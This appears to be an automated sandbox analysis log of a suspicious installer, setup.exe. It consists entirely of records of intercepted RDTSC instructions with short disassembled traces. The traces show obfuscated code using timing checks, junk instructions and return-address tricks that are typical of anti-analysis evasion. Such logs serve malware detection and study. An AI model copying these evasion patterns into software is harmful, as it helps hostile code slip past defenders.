Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CB00E second address: 3CB0A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnp 00007F47D8E3B0B3h 0x00000010 jmp 00007F47D8E3B0ADh 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F47D8E3B0A8h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 00000019h 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 mov dword ptr [ebp+122D24DDh], edi 0x00000036 push 00000000h 0x00000038 push ecx 0x00000039 xor dword ptr [ebp+122D2CD2h], edx 0x0000003f pop ebx 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push edx 0x00000045 call 00007F47D8E3B0A8h 0x0000004a pop edx 0x0000004b mov dword ptr [esp+04h], edx 0x0000004f add dword ptr [esp+04h], 0000001Ah 0x00000057 inc edx 0x00000058 push edx 0x00000059 ret 0x0000005a pop edx 0x0000005b ret 0x0000005c and di, 840Bh 0x00000061 mov ebx, dword ptr [ebp+122D38ACh] 0x00000067 mov ebx, dword ptr [ebp+122D3854h] 0x0000006d xchg eax, esi 0x0000006e push eax 0x0000006f push edx 0x00000070 push edx 0x00000071 pushad 0x00000072 popad 0x00000073 pop edx 0x00000074 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CB0A9 second address: 3CB0AE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CB0AE second address: 3CB0CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F47D8E3B0B2h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CD17B second address: 3CD17F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CD17F second address: 3CD183 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CD183 second address: 3CD195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F47D8E48268h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CD195 second address: 3CD1FB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F47D8E3B0B0h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F47D8E3B0A8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov ebx, dword ptr [ebp+122D295Ch] 0x0000002c push 00000000h 0x0000002e or dword ptr [ebp+122D28BBh], edi 0x00000034 push 00000000h 0x00000036 call 00007F47D8E3B0ACh 0x0000003b pop ebx 0x0000003c jnp 00007F47D8E3B0A9h 0x00000042 xchg eax, esi 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 pop eax 0x00000049 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CD1FB second address: 3CD20F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48270h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CD20F second address: 3CD23A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F47D8E3B0B5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CD23A second address: 3CD240 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CB29F second address: 3CB353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F47D8E3B0ACh 0x0000000b popad 0x0000000c nop 0x0000000d sub edi, 7EE2A94Fh 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov edi, dword ptr [ebp+122D2A24h] 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 push ecx 0x00000028 mov edi, dword ptr [ebp+1248495Bh] 0x0000002e pop ebx 0x0000002f mov bx, 6713h 0x00000033 mov eax, dword ptr [ebp+122D0311h] 0x00000039 push 00000000h 0x0000003b push esi 0x0000003c call 00007F47D8E3B0A8h 0x00000041 pop esi 0x00000042 mov dword ptr [esp+04h], esi 0x00000046 add dword ptr [esp+04h], 0000001Ah 0x0000004e inc esi 0x0000004f push esi 0x00000050 ret 0x00000051 pop esi 0x00000052 ret 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push eax 0x00000058 call 00007F47D8E3B0A8h 0x0000005d pop eax 0x0000005e mov dword ptr [esp+04h], eax 0x00000062 add dword ptr [esp+04h], 00000019h 0x0000006a inc eax 0x0000006b push eax 0x0000006c ret 0x0000006d pop eax 0x0000006e ret 0x0000006f or bx, 7C80h 0x00000074 mov ebx, dword ptr [ebp+122D2A2Ch] 0x0000007a nop 0x0000007b push eax 0x0000007c jmp 00007F47D8E3B0B5h 0x00000081 pop eax 0x00000082 push eax 0x00000083 push eax 0x00000084 push edx 0x00000085 jmp 00007F47D8E3B0AAh 0x0000008a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CB353 second address: 3CB35D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F47D8E48266h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CC2FF second address: 3CC3A5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F47D8E3B0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F47D8E3B0A8h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 push edi 0x00000029 mov ebx, 52BAEEE0h 0x0000002e pop ebx 0x0000002f push dword ptr fs:[00000000h] 0x00000036 xor edi, 615BE237h 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 push 00000000h 0x00000045 push eax 0x00000046 call 00007F47D8E3B0A8h 0x0000004b pop eax 0x0000004c mov dword ptr [esp+04h], eax 0x00000050 add dword ptr [esp+04h], 0000001Ch 0x00000058 inc eax 0x00000059 push eax 0x0000005a ret 0x0000005b pop eax 0x0000005c ret 0x0000005d mov ebx, dword ptr [ebp+1248493Fh] 0x00000063 mov ebx, 400639D1h 0x00000068 mov eax, dword ptr [ebp+122D0EFDh] 0x0000006e mov dword ptr [ebp+1247ABC1h], ecx 0x00000074 push FFFFFFFFh 0x00000076 sub edi, dword ptr [ebp+1247A6F6h] 0x0000007c push eax 0x0000007d pushad 0x0000007e push eax 0x0000007f push edx 0x00000080 jmp 00007F47D8E3B0B5h 0x00000085 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CD36C second address: 3CD37B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jc 00007F47D8E4826Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3D0090 second address: 3D0095 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CF332 second address: 3CF345 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F47D8E4826Bh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CF345 second address: 3CF349 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3D0095 second address: 3D00DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F47D8E48268h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 mov edi, dword ptr [ebp+122D298Ah] 0x0000002e push 00000000h 0x00000030 movsx ebx, dx 0x00000033 and ebx, dword ptr [ebp+122D3688h] 0x00000039 push eax 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d jno 00007F47D8E48266h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3D00DD second address: 3D00E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3D0F28 second address: 3D0F70 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 add bh, FFFFFFBFh 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F47D8E48268h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 mov edi, esi 0x00000029 push 00000000h 0x0000002b pushad 0x0000002c add edi, dword ptr [ebp+122D3970h] 0x00000032 mov dword ptr [ebp+12484427h], edi 0x00000038 popad 0x00000039 mov ebx, 6C0890A6h 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 push ecx 0x00000042 pushad 0x00000043 popad 0x00000044 pop ecx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3D0F70 second address: 3D0F7A instructions: 0x00000000 rdtsc 0x00000002 je 00007F47D8E3B0ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3D8E04 second address: 3D8E2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E4826Dh 0x00000007 jmp 00007F47D8E48272h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3D8E2B second address: 3D8E35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F47D8E3B0A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3DEE2E second address: 3DEE32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3DEE32 second address: 3DEE51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F47D8E3B0AAh 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push edx 0x00000016 pop edx 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3DEE51 second address: 3DEE56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3DEE56 second address: 3DEE5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3DEF50 second address: 3DEF54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3DEF54 second address: 3DEF62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F47D8E3B0A6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3E44DD second address: 3E4504 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48278h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jc 00007F47D8E48266h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3E4504 second address: 3E4510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F47D8E3B0A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3E4510 second address: 3E4518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3E4518 second address: 3E4523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3E4523 second address: 3E4527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3E4527 second address: 3E452B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3E370C second address: 3E3710 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3E3869 second address: 3E386D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3E386D second address: 3E3882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E4826Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3E39A9 second address: 3E39B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3E39B3 second address: 3E39CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E48275h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3E39CF second address: 3E39E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0ABh 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3E3CDB second address: 3E3CE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3E3E6E second address: 3E3E74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3E3FF5 second address: 3E3FF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3E3FF9 second address: 3E400A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F47D8E3B0A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3E400A second address: 3E4027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E48278h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3E4027 second address: 3E402D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3E402D second address: 3E4033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3E4175 second address: 3E418F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 jne 00007F47D8E3B0A8h 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push esi 0x00000016 pop esi 0x00000017 push eax 0x00000018 pop eax 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3E418F second address: 3E419B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F47D8E48266h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3E419B second address: 3E419F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3E8F08 second address: 3E8F1C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F47D8E48268h 0x00000008 pushad 0x00000009 popad 0x0000000a jng 00007F47D8E4826Eh 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 36CABC second address: 36CAC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3E7D32 second address: 3E7D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 jmp 00007F47D8E4826Dh 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3E7D48 second address: 3E7D6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B6h 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F47D8E3B0A6h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3E7D6A second address: 3E7D6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BF410 second address: 3BF42A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E3B0B5h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BF42A second address: 399C08 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F47D8E48268h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jns 00007F47D8E48274h 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007F47D8E48268h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e mov edx, 7F0CDDD1h 0x00000033 lea eax, dword ptr [ebp+124941F6h] 0x00000039 nop 0x0000003a push edi 0x0000003b jmp 00007F47D8E48273h 0x00000040 pop edi 0x00000041 push eax 0x00000042 push ecx 0x00000043 push esi 0x00000044 jc 00007F47D8E48266h 0x0000004a pop esi 0x0000004b pop ecx 0x0000004c nop 0x0000004d mov ch, bh 0x0000004f sbb edi, 0370D000h 0x00000055 call dword ptr [ebp+122D2C7Dh] 0x0000005b pushad 0x0000005c jmp 00007F47D8E48273h 0x00000061 jmp 00007F47D8E48279h 0x00000066 push ebx 0x00000067 jmp 00007F47D8E48270h 0x0000006c jmp 00007F47D8E48270h 0x00000071 pop ebx 0x00000072 push edx 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BFAFB second address: 3BFB00 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BFB00 second address: 3BFB15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 je 00007F47D8E48268h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BFBA1 second address: 3BFBA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BFC8C second address: 3BFC90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BFC90 second address: 3BFCA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BFCA3 second address: 3BFCBE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F47D8E48268h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jp 00007F47D8E48274h 0x00000011 push eax 0x00000012 push edx 0x00000013 jc 00007F47D8E48266h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BFCBE second address: 3BFCD9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xchg eax, esi 0x00000007 movsx edx, bx 0x0000000a or ecx, dword ptr [ebp+122D294Bh] 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jc 00007F47D8E3B0A6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BFCD9 second address: 3BFCDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BFE1F second address: 3BFE31 instructions: 0x00000000 rdtsc 0x00000002 js 00007F47D8E3B0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F47D8E3B0A6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BFE31 second address: 3BFE5F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F47D8E48266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F47D8E48279h 0x00000012 push eax 0x00000013 push edx 0x00000014 jl 00007F47D8E48266h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BFE5F second address: 3BFE8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c pushad 0x0000000d jbe 00007F47D8E3B0A6h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 jmp 00007F47D8E3B0ADh 0x0000001b popad 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 js 00007F47D8E3B0A6h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BFE8F second address: 3BFE95 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BFE95 second address: 3BFE9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BFE9B second address: 3BFE9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BFE9F second address: 3BFEC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F47D8E3B0AEh 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BFFBA second address: 3BFFC7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BFFC7 second address: 3BFFCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
